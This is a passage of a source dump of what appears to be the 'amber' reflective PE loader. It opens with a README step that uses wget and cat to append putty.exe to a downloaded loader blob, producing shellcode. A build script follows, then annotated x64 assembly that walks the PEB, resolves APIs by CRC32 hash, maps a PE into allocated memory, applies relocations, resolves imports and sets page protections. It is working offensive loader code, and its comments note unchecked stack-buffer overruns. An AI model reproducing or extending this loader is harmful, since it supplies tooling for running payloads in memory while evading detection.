13 | - [amber_loader-x86-lite.bin](https://github.com/EgeBalci/amber/raw/master/loader/loader-x86/amber_loader-x86-lite.bin)
14 | - [amber_loader-x64-lite.bin](https://github.com/EgeBalci/amber/raw/master/loader/loader-x64/amber_loader-x64-lite.bin)
15 |
16 | ### Example: Converting putty.exe into shellcode
17 | ```bash
18 | wget https://github.com/EgeBalci/amber/raw/master/loader/loader-x64/amber_loader-x64-lite.bin -O shellcode
19 | cat putty.exe >> shellcode && xxd -i shellcode
20 | ```
21 | **(!! the lite version does not wipe itself from memory !!)**
--------------------------------------------------------------------------------
/loader/loader-x64/amber_loader-x64-lite.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/loader/loader-x64/amber_loader-x64-lite.bin
--------------------------------------------------------------------------------
/loader/loader-x64/build.sh:
--------------------------------------------------------------------------------
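#!/bin/bash
# Assembles the x64 loader with nasm, embeds the raw bytes into a C header
# (shellcode.h) and builds the test executable from stub.c with the mingw-w64
# cross compiler. Requires: nasm, xxd, x86_64-w64-mingw32-gcc.

## ANSI Colors (FG & BG)
RED="$(printf '\033[31m')" GREEN="$(printf '\033[32m')" YELLOW="$(printf '\033[33m')" BLUE="$(printf '\033[34m')"
MAGENTA="$(printf '\033[35m')" CYAN="$(printf '\033[36m')" WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')"
REDBG="$(printf '\033[41m')" GREENBG="$(printf '\033[42m')" YELLOWBG="$(printf '\033[43m')" BLUEBG="$(printf '\033[44m')"
MAGENTABG="$(printf '\033[45m')" CYANBG="$(printf '\033[46m')" WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')"
RESET="$(printf '\e[0m')"

# Print a yellow "[!]" warning line.
print_warning() {
    echo "${YELLOW}[!] ${RESET}${1}"
}
# Print a red "[-]" error line.
print_error() {
    echo "${RED}[-] ${RESET}${1}"
}
# Print a red "[!]" line and abort. The helpers run in the current shell (they
# are invoked as `cmd || print_fatal ...`), so a plain exit ends the script; the
# previous `kill -10 $$` relied on SIGUSR1's default disposition and produced a
# signal exit status instead of a conventional failure code.
print_fatal() {
    echo -e "${RED}[!] $1\n${RESET}"
    exit 1
}
# Print a green "[+]" success line.
print_good() {
    echo "${GREEN}[+] ${RESET}${1}"
}
# Print a yellow "[*]" status line.
print_status() {
    echo "${YELLOW}[*] ${RESET}${1}"
}

nasm -f bin loader-x64.asm -o shellcode || print_fatal "nasm failed!"
print_status "Payload Size: $(wc -c shellcode | cut -d' ' -f1)"
[[ -f shellcode ]] && xxd -i shellcode shellcode.h

x86_64-w64-mingw32-gcc stub.c -o test.exe || print_fatal "Compilation failed!"
# NOTE(review): writes the test binary into the shared /tmp directory.
cp test.exe /tmp/
rm shellcode shellcode.h
print_good "Build done!"
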
--------------------------------------------------------------------------------
/loader/loader-x64/inc/calc_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
; calc_crc — hash a byte string with the x86 CRC32 instruction.
;   rcx = pointer to the bytes
;   dx  = byte count; 0 means "hash up to the NUL terminator"
;   returns eax = hash (0 for an empty NUL-terminated string)
; NOTE: the accumulator starts at 0 and there is no final inversion, so this is
; the raw CRC32 (Castagnoli) instruction result rather than the standard CRC-32
; checksum; any precomputed hash compared against it must be derived the same way.
calc_crc:
    test dx,dx
    je loc_1400039c9            ; zero length -> NUL-terminated path
    mov r8,rcx
    movzx edx,dx
    lea eax,[rdx-0x1]
    lea rdx,[rcx+rax*1+0x1]     ; rdx = one past the last byte
    mov eax,0x0
loc_1400039b8:                  ; counted loop
    crc32 eax,BYTE [r8]
    add r8,0x1
    cmp r8,rdx
    jne loc_1400039b8
    jmp loc_1400039ea
loc_1400039c9:                  ; NUL-terminated loop
    movzx edx,BYTE [rcx]
    test dl,dl
    je loc_1400039eb            ; empty string -> 0
    add rcx,0x1
    mov eax,0x0
loc_1400039d9:
    crc32 eax,dl
    add rcx,0x1
    movzx edx,BYTE [rcx-0x1]
    test dl,dl
    jne loc_1400039d9
loc_1400039ea:
    ret
loc_1400039eb:
    mov eax,0x0
    jmp loc_1400039ea
--------------------------------------------------------------------------------
/loader/loader-x64/inc/get_module_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
; get_module_by_crc — find a loaded module whose name hashes to the given value.
;   ecx = expected calc_crc value of the module name
;   returns rax = module base, or 0 when no entry matches or the list is empty
; Walks the process's loader module list reached from the PEB (gs:0x60 -> +0x18
; -> list head at +0x20) and hashes each entry's name buffer ([+0x50], byte
; length at [+0x48]) with calc_crc. The raw byte length is passed, so the
; expected hash is over the name as stored (presumably UTF-16 — confirm).
get_module_by_crc:
    push rdi
    push rsi
    push rbx
    sub rsp,0x20
    mov esi,ecx                 ; esi = target hash
    mov rax,QWORD gs:0x60
    mov rax,QWORD [rax+0x18]
    lea rdi,[rax+0x20]          ; rdi = list head, used as the loop sentinel
    mov rbx,QWORD [rax+0x20]    ; rbx = first entry
    cmp rdi,rbx
    je loc_140102e89            ; empty list
loc_140102e5d:
    movzx edx,WORD [rbx+0x48]
    mov rcx,QWORD [rbx+0x50]
    call calc_crc
    cmp eax,esi
    je loc_140102e7d
    mov rbx,QWORD [rbx]         ; next entry
    cmp rdi,rbx
    jne loc_140102e5d
    mov eax,0x0                 ; wrapped around to the head: not found
    jmp loc_140102e81
loc_140102e7d:
    mov rax,QWORD [rbx+0x20]    ; matched: module base
loc_140102e81:
    add rsp,0x20
    pop rbx
    pop rsi
    pop rdi
    ret
loc_140102e89:
    mov eax,0x0
    jmp loc_140102e81
38 |
--------------------------------------------------------------------------------
/loader/loader-x64/inc/get_proc_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
; get_proc_by_crc — resolve an export of a loaded module by name hash or index.
;   rcx = module base
;   edx = expected calc_crc value of the export name
;   r8d = name index accepted unconditionally (0xffffffff = match by hash only)
;   returns rax = function address, or 0 when the module has no named exports,
;           no name matches, or a forwarded-to module cannot be loaded
; Parses the PE export directory (data directory at NT headers +0x88/+0x8c for
; PE32+) and hashes every entry of AddressOfNames with calc_crc. If the resolved
; address falls inside the export directory it is a forwarder string
; "DLL.Function": the two parts are copied into 260-byte stack buffers, the DLL is
; loaded with load_module and the function is resolved recursively by hash.
; NOTE: the "DLL.#ordinal" forwarder form is not handled (the part after the dot
; is always hashed as a name), and neither copy length is checked against the
; 260-byte buffers, so an overlong forwarder string would overrun the stack.
; memcpy is defined elsewhere; from its use here it takes (rcx=dst, rdx=src,
; r8=length) — confirm.
get_proc_by_crc:
    push r15
    push r14
    push r13
    push r12
    push rbp
    push rdi
    push rsi
    push rbx
    sub rsp,0x258
    mov rbx,rcx                 ; rbx = module base
    mov r13d,edx                ; r13d = target hash
    mov ebp,r8d                 ; ebp = unconditional name index
    movsxd rax,DWORD [rcx+0x3c] ; e_lfanew
    add rax,rcx                 ; rax = NT headers
    mov esi,DWORD [rax+0x88]    ; export directory RVA
    add rsi,rcx                 ; rsi = export directory VA
    mov eax,DWORD [rax+0x8c]    ; export directory size
    mov DWORD [rsp+0x2c],eax
    mov r12d,DWORD [rsi+0x20]   ; AddressOfNames
    mov r14d,DWORD [rsi+0x1c]   ; AddressOfFunctions
    mov r15d,DWORD [rsi+0x24]   ; AddressOfNameOrdinals
    mov eax,DWORD [rsi+0x18]    ; NumberOfNames
    test eax,eax
    je loc_140003764            ; no named exports
    mov eax,eax
    mov QWORD [rsp+0x20],rax    ; loop bound
    mov edi,0x0                 ; rdi = current name index
    add r12,rcx
loc_1400035dc:
    mov ecx,DWORD [r12+rdi*4]
    add rcx,rbx
    mov edx,0x0
    call calc_crc               ; hash the NUL-terminated export name
    cmp ebp,edi
    je loc_14000360b            ; index match
    cmp eax,r13d
    je loc_14000360b            ; hash match
    add rdi,0x1
    cmp QWORD [rsp+0x20],rdi
    jne loc_1400035dc
    mov eax,0x0                 ; not found
    jmp loc_140003738
loc_14000360b:
    lea rax,[rbx+rdi*2]
    movzx eax,WORD [rax+r15*1]  ; ordinal for this name
    lea rax,[rbx+rax*4]
    mov eax,DWORD [rax+r14*1]   ; function RVA
    add rbx,rax                 ; rbx = function VA
    cmp rbx,rsi
    jb loc_140003735            ; below the export directory: real function
    mov eax,DWORD [rsp+0x2c]
    add rsi,rax
    cmp rbx,rsi
    jae loc_140003735           ; above the export directory: real function
    ; inside the export directory: forwarder string "DLL.Function"
    mov QWORD [rsp+0x30],0x0    ; zero the DLL-name buffer at [rsp+0x30]
    mov QWORD [rsp+0x38],0x0
    lea rdi,[rsp+0x40]
    mov eax,0x0
    mov ecx,0x1e
    rep stosq
    mov DWORD [rdi],0x0
    mov QWORD [rsp+0x140],0x0   ; zero the function-name buffer at [rsp+0x140]
    mov QWORD [rsp+0x148],0x0
    lea rdi,[rsp+0x150]
    mov ecx,0x1e
    rep stosq
    mov DWORD [rdi],0x0
    cmp BYTE [rbx],0x2e         ; '.'
    je loc_14000374c            ; leading dot: empty DLL part
    mov eax,0x1
loc_14000369e:                  ; find the '.' separator; r8 = its offset
    mov r8,rax
    add rax,0x1
    cmp BYTE [rbx+rax*1-0x1],0x2e
    jne loc_14000369e
    mov esi,r8d                 ; esi = dot offset
loc_1400036af:
    lea rcx,[rsp+0x30]
    mov rdx,rbx
    call memcpy                 ; copy the DLL part (r8 bytes)
    lea ecx,[rsi+0x1]
    movsxd rcx,ecx
    add rcx,rbx                 ; rcx = function part after the '.'
    cmp BYTE [rcx],0x0
    je loc_14000375c            ; empty function part
    mov eax,0x1
    movsxd rdx,esi
    add rdx,rbx
loc_1400036d9:                  ; strlen of the function part; r8 = length
    mov r8,rax
    add rax,0x1
    cmp BYTE [rdx+rax*1],0x0
    jne loc_1400036d9
loc_1400036e6:
    lea rax,[rsp+0x140]
    mov rdx,rcx
    mov rcx,rax
    call memcpy                 ; copy the function part (r8 bytes)
    lea rcx,[rsp+0x30]
    call load_module            ; load the forwarded-to module
    mov rbx,rax
    mov eax,0x0
    test rbx,rbx
    je loc_140003738            ; load failed -> 0
    lea rcx,[rsp+0x140]
    mov edx,0x0
    call calc_crc               ; hash the forwarded function name
    mov edx,eax
    mov r8d,0xffffffff
    mov rcx,rbx
    call get_proc_by_crc        ; recurse into the target module (hash only)
    mov rbx,rax
loc_140003735:
    mov rax,rbx
loc_140003738:
    add rsp,0x258
    pop rbx
    pop rsi
    pop rdi
    pop rbp
    pop r12
    pop r13
    pop r14
    pop r15
    ret
loc_14000374c:
    mov esi,0x0
    mov r8d,0x0
    jmp loc_1400036af
loc_14000375c:
    mov r8d,0x0
    jmp loc_1400036e6
loc_140003764:
    mov eax,0x0
    jmp loc_140003738
--------------------------------------------------------------------------------
/loader/loader-x64/inc/load_module.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
; load_module — load a module by its ANSI name through a hash-resolved API.
;   rcx = NUL-terminated ANSI module name
;   returns rax = module handle, or 0 when the call returns a negative status
; The name is widened byte-by-byte into a 0x208-byte stack buffer described by a
; UNICODE_STRING-shaped header at [rsp+0x230] (Length, MaximumLength, Buffer at
; +0x238). The target function is looked up by api_call (defined elsewhere) from
; the hash in r10 and invoked as f(0, 0, &string, &handle); which API the hash
; 0xB4EBB9A4 denotes is not visible here — confirm against api_call's table.
; NOTE: the widening loop sign-extends each byte (movsx), so names containing
; bytes >= 0x80 are not converted correctly, and the name length is not checked
; against the buffer, so a name longer than 259 characters overruns the stack.
load_module:
    push rdi
    sub rsp,0x250
    mov r8,rcx                  ; r8 = ANSI name
    mov QWORD [rsp+0x248],0x0   ; output handle
    mov DWORD [rsp+0x234],0x0
    lea rdi,[rsp+0x20]
    mov ecx,0x41
    mov eax,0x0
    rep stosq                   ; zero the wide-char buffer (0x41 qwords)
    cmp BYTE [r8],0x0
    je loc_140003873            ; empty name
    mov edx,0x1
loc_1400037eb:                  ; strlen; rax = length
    mov rax,rdx
    add rdx,0x1
    cmp BYTE [r8+rdx*1-0x1],0x0
    jne loc_1400037eb
    lea edx,[rax+rax*1]         ; Length = 2 * strlen
    mov WORD [rsp+0x230],dx
    add edx,0x2
    mov WORD [rsp+0x232],dx     ; MaximumLength = Length + 2
    lea rdx,[rsp+0x20]
    mov QWORD [rsp+0x238],rdx   ; Buffer
    sub eax,0x1
    js loc_140003837
    cdqe
loc_140003824:                  ; widen the name from the last byte backwards
    movsx dx,BYTE [r8+rax*1]
    mov WORD [rsp+rax*2+0x20],dx
    sub rax,0x1
    test eax,eax
    jns loc_140003824
loc_140003837:
    lea r9,[rsp+0x248]          ; arg 4: &handle
    lea r8,[rsp+0x230]          ; arg 3: &string
    mov edx,0x0
    mov ecx,0x0
    mov r10, 0xB4EBB9A4
    call api_call
    call rax ;
    test eax,eax
    js loc_14000386c            ; negative status -> failure
    mov rax,QWORD [rsp+0x248]
loc_140003863:
    add rsp,0x250
    pop rdi
    ret
loc_14000386c:
    mov eax,0x0
    jmp loc_140003863
loc_140003873:                  ; empty name: Length 0, MaximumLength 2
    mov WORD [rsp+0x230],0x0
    mov WORD [rsp+0x232],0x2
    lea rax,[rsp+0x20]
    mov QWORD [rsp+0x238],rax
    jmp loc_140003837
--------------------------------------------------------------------------------
/loader/loader-x64/inc/map_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 | ; map_image(RCX = raw PE image in memory) -> RAX = base of a fresh, section-mapped copy, or 0 (bad signature or allocation failure).
3 | ; Allocates SizeOfImage bytes read/write via the API api_call resolves for hash 0x99CE7C55 (argument layout matches NtAllocateVirtualMemory — confirm against crc32_api), copies the headers, then copies every section to its VirtualAddress. All offsets are taken from the image as-is; nothing is range-checked against the allocation or the raw file.
4 | map_image:
5 | push rbp
6 | push rdi
7 | push rsi
8 | push rbx
9 | sub rsp,0x48 ; shadow space, two stack arguments and the out-params (+0x30 RegionSize, +0x38 BaseAddress)
10 | mov rbp,rcx ; rbp = raw image
11 | movsxd rdi,DWORD [rcx+0x3c] ; e_lfanew
12 | add rdi,rcx ; rdi = IMAGE_NT_HEADERS
13 | mov eax,0x0
14 | cmp DWORD [rdi],0x4550 ; "PE\0\0"
15 | jne loc_1400020b8 ; not a PE → return 0
16 | mov QWORD [rsp+0x38],0x0 ; BaseAddress = NULL (any address)
17 | mov eax,DWORD [rdi+0x50] ; OptionalHeader.SizeOfImage
18 | mov QWORD [rsp+0x30],rax ; RegionSize
19 | lea rdx,[rsp+0x38] ; arg2: &BaseAddress
20 | mov DWORD [rsp+0x28],0x4 ; arg6: 0x4 = PAGE_READWRITE (final protections are applied later by protect_sections)
21 | mov DWORD [rsp+0x20],0x103000 ; arg5: 0x103000 = MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN
22 | lea r9,[rsp+0x30] ; arg4: &RegionSize
23 | mov r8d,0x0 ; arg3: 0
24 | mov rcx,0xffffffffffffffff ; arg1: current-process pseudo handle (-1)
25 | mov r10, 0x99CE7C55 ; hash consumed by api_call
26 | call api_call ; RAX = resolved function pointer
27 | call rax ; allocate
28 | mov edx,eax
29 | mov eax,0x0
30 | test edx,edx
31 | js loc_1400020b8 ; negative NTSTATUS → return 0
32 | mov r8d,DWORD [rdi+0x54] ; size = OptionalHeader.SizeOfHeaders
33 | mov rdx,rbp ; src = raw image
34 | mov rcx,QWORD [rsp+0x38] ; dst = new base
35 | call memcpy ; copy the headers
36 | movzx eax,WORD [rdi+0x14] ; FileHeader.SizeOfOptionalHeader
37 | lea rbx,[rdi+rax*1+0x18] ; rbx = first IMAGE_SECTION_HEADER
38 | cmp WORD [rdi+0x6],0x0 ; FileHeader.NumberOfSections
39 | je loc_1400020b3 ; no sections → done
40 | mov esi,0x0 ; esi = section index
41 | loc_14000208d: ; memcpy(base + VirtualAddress, raw + PointerToRawData, SizeOfRawData)
42 | mov ecx,DWORD [rbx+0xc] ; VirtualAddress
43 | add rcx,QWORD [rsp+0x38]
44 | mov edx,DWORD [rbx+0x14] ; PointerToRawData
45 | add rdx,rbp
46 | mov r8d,DWORD [rbx+0x10] ; SizeOfRawData (0 for uninitialised-data sections → nothing copied)
47 | call memcpy
48 | add esi,0x1
49 | add rbx,0x28 ; sizeof(IMAGE_SECTION_HEADER)
50 | movzx eax,WORD [rdi+0x6]
51 | cmp eax,esi
52 | jg loc_14000208d
53 | loc_1400020b3:
54 | mov rax,QWORD [rsp+0x38] ; return the new base
55 | loc_1400020b8:
56 | add rsp,0x48
57 | pop rbx
58 | pop rsi
59 | pop rdi
60 | pop rbp
61 | ret
--------------------------------------------------------------------------------
/loader/loader-x64/inc/memcpy.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 | ; memcpy(&dst, &src, size)
4 | ; RCX = &dst
5 | ; RDX = &src
6 | ; R8 = size
7 | memcpy: ; forward byte copy; assumes DF is clear (nothing here executes cld) and does not handle overlapping ranges. RCX is clobbered.
8 | push rsi
9 | push rdi
10 | mov rdi,rcx ; destination
11 | mov rsi,rdx ; source
12 | mov rcx,r8 ; byte count
13 | copy_byte:
14 | rep movsb ; Copy RCX bytes from [RSI] to [RDI]
15 | pop rdi ; Restore RDI
16 | pop rsi ; Restore RSI
17 | ret ; Return
--------------------------------------------------------------------------------
/loader/loader-x64/inc/protect_sections.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 | ; protect_sections(RCX = mapped image base) -> EAX = 1 on success, 0 as soon as one protection call fails.
3 | ; For each section with non-zero Characteristics, maps IMAGE_SCN_MEM_EXECUTE / READ / WRITE (0x20000000 / 0x40000000 / 0x80000000) to a PAGE_* constant in R9D and applies it with the API api_call resolves for hash 0x6EDE4D41 (argument layout matches NtProtectVirtualMemory — confirm against crc32_api). The jump-heavy middle is a compiler-generated decision tree; the comments name the values it produces.
4 | protect_sections:
5 | push r14
6 | push r13
7 | push r12
8 | push rbp
9 | push rdi
10 | push rsi
11 | push rbx
12 | sub rsp,0x50 ; shadow space, the 5th argument slot and locals (+0x3c OldProtect, +0x40 RegionSize, +0x48 BaseAddress)
13 | mov rbp,rcx ; rbp = image base
14 | movsxd rdi,DWORD [rcx+0x3c] ; e_lfanew
15 | add rdi,rcx ; rdi = IMAGE_NT_HEADERS
16 | movzx eax,WORD [rdi+0x14] ; FileHeader.SizeOfOptionalHeader
17 | lea rbx,[rdi+rax*1+0x18] ; rbx = first IMAGE_SECTION_HEADER
18 | mov QWORD [rsp+0x48],0x0
19 | cmp WORD [rdi+0x6],0x0 ; FileHeader.NumberOfSections
20 | je loc_140002e87 ; no sections → success
21 | mov esi,0x0 ; esi = section index
22 | mov r12d,0x0 ; constant 0, used as a "flag clear" value by the decision tree
23 | lea r14,[rsp+0x40] ; r14 = &RegionSize
24 | lea r13,[rsp+0x48] ; r13 = &BaseAddress
25 | jmp loc_140002f50 ; enter the loop at its head
26 | loc_140002e38: ; READ+WRITE+EXECUTE
27 | mov ecx,0x1
28 | loc_140002e3d: ; EXECUTE+WRITE: R9D = 0x20 (PAGE_EXECUTE_READ) when READ is also set, else 0x80 (PAGE_EXECUTE_WRITECOPY); R8B = 1 so loc_140002eed can promote to 0x40
29 | and eax,0x60000000 ; keep READ|EXECUTE
30 | mov r8d,0x1
31 | cmp eax,0x60000000
32 | mov r9d,0x20
33 | mov eax,0x80
34 | cmovne r9d,eax
35 | jmp loc_140002eed
36 | loc_140002e61: ; READ+EXECUTE, no WRITE
37 | mov r9d,0x20 ; PAGE_EXECUTE_READ
38 | jmp loc_140002efd
39 | loc_140002e6c: ; protection call failed → return 0
40 | mov eax,0x0
41 | jmp loc_140002e78
42 | loc_140002e73: ; every section processed → return 1
43 | mov eax,0x1
44 | loc_140002e78: ; common epilogue
45 | add rsp,0x50
46 | pop rbx
47 | pop rsi
48 | pop rdi
49 | pop rbp
50 | pop r12
51 | pop r13
52 | pop r14
53 | ret
54 | loc_140002e87: ; no sections → return 1
55 | mov eax,0x1
56 | jmp loc_140002e78
57 | loc_140002e8e: ; READ+EXECUTE (no WRITE): starts as 0x10 (PAGE_EXECUTE), upgraded to 0x20 at loc_140002e61
58 | mov ecx,0x1
59 | mov r8d,r12d
60 | mov r9d,0x10
61 | jmp loc_140002edd
62 | loc_140002e9e: ; READ not set
63 | mov ecx,r12d
64 | test eax,0x20000000 ; EXECUTE?
65 | je loc_140002eda ; neither READ nor EXECUTE → keep the default computed at the loop head
66 | mov ecx,0x0
67 | test eax,eax ; WRITE (bit 31)?
68 | js loc_140002e3d
69 | mov ecx,eax
70 | shr ecx,0x1f
71 | mov r8d,ecx
72 | mov ecx,r12d
73 | mov r9d,0x10 ; EXECUTE only → PAGE_EXECUTE
74 | jmp loc_140002edd
75 | loc_140002ec4: ; READ+WRITE
76 | test eax,0x20000000 ; EXECUTE too?
77 | jne loc_140002e38
78 | mov ecx,0x1
79 | mov r9d,0x4 ; PAGE_READWRITE
80 | loc_140002eda:
81 | mov r8d,r12d
82 | loc_140002edd:
83 | and eax,0x60000000
84 | cmp eax,0x60000000 ; READ and EXECUTE both set?
85 | je loc_140002e61
86 | loc_140002eed: ; CL=1 (READ) and R8B=1 (from loc_140002e3d) together mean READ+WRITE+EXECUTE → 0x40 (PAGE_EXECUTE_READWRITE)
87 | test cl,cl
88 | je loc_140002efd
89 | test r8b,r8b
90 | mov eax,0x40
91 | cmovne r9d,eax
92 | loc_140002efd: ; apply R9D to [base + VirtualAddress, + SizeOfRawData)
93 | mov eax,DWORD [rdx+0xc] ; section VirtualAddress
94 | add rax,rbp
95 | mov QWORD [rsp+0x48],rax ; BaseAddress
96 | mov eax,DWORD [rdx+0x10] ; SizeOfRawData, not VirtualSize (+0x8): the uninitialised tail of a section keeps the allocation's original protection
97 | mov QWORD [rsp+0x40],rax ; RegionSize
98 | mov DWORD [rsp+0x3c],0x0 ; OldProtect
99 | lea rax,[rsp+0x3c]
100 | mov QWORD [rsp+0x20],rax ; arg5: &OldProtect
101 | mov r8,r14 ; arg3: &RegionSize
102 | mov rdx,r13 ; arg2: &BaseAddress
103 | mov rcx,0xffffffffffffffff ; arg1: current-process pseudo handle; arg4 (R9D) is the new protection
104 | mov r10, 0x6EDE4D41 ; hash consumed by api_call
105 | call api_call ; RAX = resolved function pointer
106 | call rax ; change the protection
107 | test eax,eax
108 | js loc_140002e6c ; negative NTSTATUS → fail
109 | loc_140002f3d: ; advance to the next section
110 | add esi,0x1
111 | add rbx,0x28 ; sizeof(IMAGE_SECTION_HEADER)
112 | movzx eax,WORD [rdi+0x6]
113 | cmp eax,esi
114 | jle loc_140002e73 ; past the last section → success
115 | loc_140002f50: ; loop head: classify the section at rbx
116 | mov rdx,rbx ; rdx = current section header
117 | mov eax,DWORD [rbx+0x24] ; Characteristics
118 | test eax,eax
119 | je loc_140002f3d ; nothing set → leave this section alone
120 | mov r9d,eax ; default: 0x8 (PAGE_WRITECOPY) if WRITE, else 0x40 (PAGE_EXECUTE_READWRITE); a section with none of the three MEM bits keeps this 0x40
121 | sar r9d,0x1f
122 | and r9d,0xffffffc8
123 | add r9d,0x40
124 | test eax,0x40000000 ; IMAGE_SCN_MEM_READ?
125 | je loc_140002e9e
126 | test eax,eax ; IMAGE_SCN_MEM_WRITE (bit 31)?
127 | js loc_140002ec4
128 | test eax,0x20000000 ; IMAGE_SCN_MEM_EXECUTE?
129 | jne loc_140002e8e
130 | mov ecx,0x1 ; READ only
131 | mov r9d,0x2 ; PAGE_READONLY
132 | jmp loc_140002eda
--------------------------------------------------------------------------------
/loader/loader-x64/inc/relocate_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 | ; relocate_image(RCX = mapped image base) -> EAX = 1 when the relocation table was walked (including an empty one), 0 when the image has no base-relocation directory.
3 | ; Walks the IMAGE_BASE_RELOCATION blocks and adds (new base - OptionalHeader.ImageBase) to every IMAGE_REL_BASED_DIR64 (type 0xA) target; every other entry type is skipped. Targets are not checked against SizeOfImage.
4 | relocate_image:
5 | mov r9,rcx ; r9 = image base
6 | movsxd rdx,DWORD [rcx+0x3c] ; e_lfanew
7 | add rdx,rcx ; rdx = IMAGE_NT_HEADERS
8 | mov eax,DWORD [rdx+0xb0] ; DataDirectory[5] (BASERELOC).VirtualAddress
9 | mov ecx,0x0 ; result = 0
10 | test eax,eax
11 | je loc_14000261a ; no relocation directory → return 0
12 | mov eax,eax ; zero-extend the RVA
13 | lea rcx,[r9+rax*1] ; rcx = first relocation block
14 | mov r10,r9
15 | sub r10,QWORD [rdx+0x30] ; r10 = delta = new base - OptionalHeader.ImageBase
16 | cmp DWORD [rcx],0x0 ; block.VirtualAddress
17 | jne loc_140002601
18 | mov ecx,0x1 ; empty table → return 1
19 | jmp loc_14000261a
20 | loc_1400025bd: ; apply one DIR64 entry: *(u64 *)(base + block.VirtualAddress + (entry & 0xfff)) += delta
21 | mov edx,DWORD [rcx]
22 | movzx r8d,WORD [rax]
23 | and r8d,0xfff ; low 12 bits = offset within the page
24 | add rdx,r8
25 | add QWORD [r9+rdx*1],r10
26 | loc_1400025d1: ; next 16-bit entry
27 | add rax,0x2
28 | mov edx,DWORD [rcx+0x4] ; block.SizeOfBlock
29 | add rdx,rcx ; end of this block
30 | cmp rax,rdx
31 | je loc_1400025f9
32 | loc_1400025e0: ; classify the entry: type is the high nibble of the WORD
33 | movzx edx,BYTE [rax+0x1]
34 | mov r8d,edx
35 | and r8d,0xfffffff0
36 | cmp r8b,0xa0 ; type 0xA = IMAGE_REL_BASED_DIR64
37 | je loc_1400025bd
38 | cmp dl,0xf ; compiler residue: both branches fall through to the next entry
39 | jbe loc_1400025d1
40 | jmp loc_1400025d1
41 | loc_1400025f9:
42 | mov rcx,rax ; rcx = next block (starts right after this one)
43 | loc_1400025fc:
44 | cmp DWORD [rcx],0x0 ; VirtualAddress 0 terminates the table
45 | je loc_140002615
46 | loc_140002601: ; start a block: entries run from +8 to +SizeOfBlock
47 | lea rax,[rcx+0x8]
48 | mov edx,DWORD [rcx+0x4]
49 | add rdx,rcx
50 | cmp rax,rdx
51 | jne loc_1400025e0
52 | mov rcx,rdx ; block without entries → skip to the next one
53 | jmp loc_1400025fc
54 | loc_140002615:
55 | mov ecx,0x1 ; done → return 1
56 | loc_14000261a:
57 | mov eax,ecx
58 | ret
--------------------------------------------------------------------------------
/loader/loader-x64/inc/resolve_imports.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 | ; resolve_imports(RCX = mapped image base) -> EAX = 1 on success, 0 if there is no import directory or load_module fails for a dependency.
3 | ; Walks the IMAGE_IMPORT_DESCRIPTOR array: loads each module by name with load_module, then fills the IAT (FirstThunk) from the name table (OriginalFirstThunk) by hashing each import name with calc_crc and looking it up with get_proc_by_crc. An import that does not resolve is left untouched, not reported.
4 | resolve_imports:
5 | push r12
6 | push rbp
7 | push rdi
8 | push rsi
9 | push rbx
10 | sub rsp,0x20 ; shadow space for the calls below
11 | mov rbp,rcx ; rbp = image base
12 | movsxd rax,DWORD [rcx+0x3c] ; e_lfanew
13 | mov eax,DWORD [rcx+rax*1+0x90] ; DataDirectory[1] (IMPORT).VirtualAddress
14 | mov edx,0x0 ; result = 0
15 | test eax,eax
16 | je loc_140002966 ; no import directory → return 0
17 | mov eax,eax ; zero-extend the RVA
18 | lea r12,[rcx+rax*1] ; r12 = first IMAGE_IMPORT_DESCRIPTOR
19 | mov ecx,DWORD [r12+0xc] ; descriptor.Name (RVA)
20 | test ecx,ecx
21 | jne loc_14000292f
22 | mov edx,0x1 ; empty table → return 1
23 | jmp loc_140002966
24 | loc_1400028cf: ; import by ordinal (bit 63 of the thunk set): hash 0, R8 = the raw thunk value
25 | mov edx,0x0 ; NOTE(review): R8 still carries the ordinal flag in bit 63; how get_proc_by_crc treats it is outside this file — verify
26 | mov rcx,rdi
27 | call get_proc_by_crc
28 | test rax,rax
29 | je loc_1400028e4 ; unresolved → IAT entry left as-is
30 | mov QWORD [rsi],rax ; patch the IAT
31 | loc_1400028e4: ; next thunk pair
32 | add rbx,0x8
33 | add rsi,0x8
34 | mov r8,QWORD [rbx] ; next OriginalFirstThunk entry
35 | test r8,r8
36 | je loc_140002922 ; 0 terminates this descriptor
37 | loc_1400028f4:
38 | test r8,r8
39 | js loc_1400028cf ; IMAGE_ORDINAL_FLAG64 (bit 63) → by ordinal
40 | lea rcx,[rbp+r8*1+0x2] ; IMAGE_IMPORT_BY_NAME.Name (skip the 2-byte Hint)
41 | mov edx,0x0 ; length 0 → calc_crc hashes up to the NUL
42 | call calc_crc
43 | mov edx,eax ; hash
44 | mov r8d,0xffffffff ; no ordinal/index
45 | mov rcx,rdi ; module base
46 | call get_proc_by_crc
47 | test rax,rax
48 | je loc_1400028e4 ; unresolved → IAT entry left as-is
49 | mov QWORD [rsi],rax ; patch the IAT
50 | loc_140002920:
51 | jmp loc_1400028e4
52 | loc_140002922: ; next descriptor
53 | add r12,0x14 ; sizeof(IMAGE_IMPORT_DESCRIPTOR)
54 | mov ecx,DWORD [r12+0xc]
55 | test ecx,ecx
56 | je loc_14000295a ; Name == 0 → terminator → success
57 | loc_14000292f:
58 | mov ecx,ecx ; zero-extend the RVA
59 | add rcx,rbp ; rcx = module name
60 | call load_module
61 | mov rdi,rax ; rdi = module base
62 | test rax,rax
63 | je loc_140002961 ; dependency failed to load → return 0
64 | mov ebx,DWORD [r12] ; OriginalFirstThunk (NOTE(review): no fallback to FirstThunk when this is 0)
65 | add rbx,rbp
66 | mov esi,DWORD [r12+0x10] ; FirstThunk = IAT
67 | add rsi,rbp
68 | mov r8,QWORD [rbx] ; first thunk
69 | test r8,r8
70 | jne loc_1400028f4
71 | jmp loc_140002922 ; descriptor without thunks → next descriptor
72 | loc_14000295a:
73 | mov edx,0x1
74 | jmp loc_140002966
75 | loc_140002961:
76 | mov edx,0x0
